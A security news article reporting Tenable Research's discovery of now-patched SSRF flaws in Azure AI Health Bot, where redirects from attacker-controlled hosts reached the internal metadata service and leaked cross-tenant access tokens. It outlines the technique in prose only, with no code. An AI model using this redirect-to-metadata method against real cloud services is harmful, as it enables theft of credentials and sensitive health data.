Multiple privilege escalation issues in the Microsoft Azure cloud-based Health Bot service could have opened the platform to Server-Side Request Forgery (SSRF) and allowed access to cross-tenant resources.
While the vulnerabilities identified by Tenable Research were quickly patched by Microsoft, they present inherent concerns about the risks posed by chatbots, the researchers warned.
Azure AI Health Bot Service enables healthcare organizations to build their own virtual health assistants to interact with patients and manage administrative workloads that can integrate with any kind of internal process and information, meaning the chatbots may have privileged access to highly sensitive health information.
“The risk to customers of a healthbot service depends entirely on the information they provide to the service,” says Jimi Sebree, senior staff research engineer at Tenable.
Azure Chatbots and Cross-Tenant Access
If a malicious actor exploited these issues, they could be granted administrative access to hundreds of resources belonging to other Azure customers, Tenable warned.
According to a blog post published today, the bug allowed the researchers to access the service's Internal Metadata Service (IMDS) and subsequently access tokens that enable the management of resources across tenants.
“Based on the level of access granted, lateral movement to other resources within the customer environment was likely possible,” Sebree said. “This is common with cloud services like this, and there are safeguards in place to prevent cross-tenant access. The vulnerability discovered by Tenable Research essentially circumvents those safeguards.”
Researchers found that the issue affected endpoints within the Data Connectivity feature that allows developers to integrate external APIs, including endpoints that support the Fast Healthcare Interoperability Resources (FHIR) data exchange format.
Simply put, the attack involved configuring data connections with malicious external hosts that would respond to queries from the platform with 301 or 302 redirect codes, indicating that the web page had been permanently moved. These redirect responses were sent back to the IMDS, which responded with metadata that leaked the access token.
“These issues were easy to exploit and required no prior knowledge beyond typical usage of the HealthBot service,” Sebry said.
Rushing AI development is dangerous
Sebree also explained that the vulnerabilities detailed in Tenable's analysis of the Health Bot service demonstrate the risks posed by the rushed development and deployment cycle of these interactive services.
“Companies need to prioritize not being first to market, but taking the time to ensure the security of their products and the security of their customers,” Sebry said.
According to a blog post from Tenable, “This vulnerability raises concerns that chatbots could be exploited to leak sensitive information. Notably, this vulnerability pertains to flaws in the underlying architecture of chatbot services, highlighting the importance of traditional web app and cloud security in the era of AI chatbots.”
This is especially important considering that the global healthcare industry, which is undergoing a transformative wave of digitalization and the adoption and integration of AI-powered applications, is a constant target for cybercriminals due to the extremely valuable personal information contained in health records.
Fortunately, efforts are underway to strengthen healthcare security in a variety of areas, including in the areas of cloud and AI. In May, the US Advanced Research Projects Agency for Health (ARPA-H) announced it would invest $50 million in an upgrade program to strengthen healthcare cybersecurity through automation and allow healthcare providers to better focus on patient care.
Healthcare providers and medical device manufacturers are also encouraged to work more closely together to improve data security across medical devices.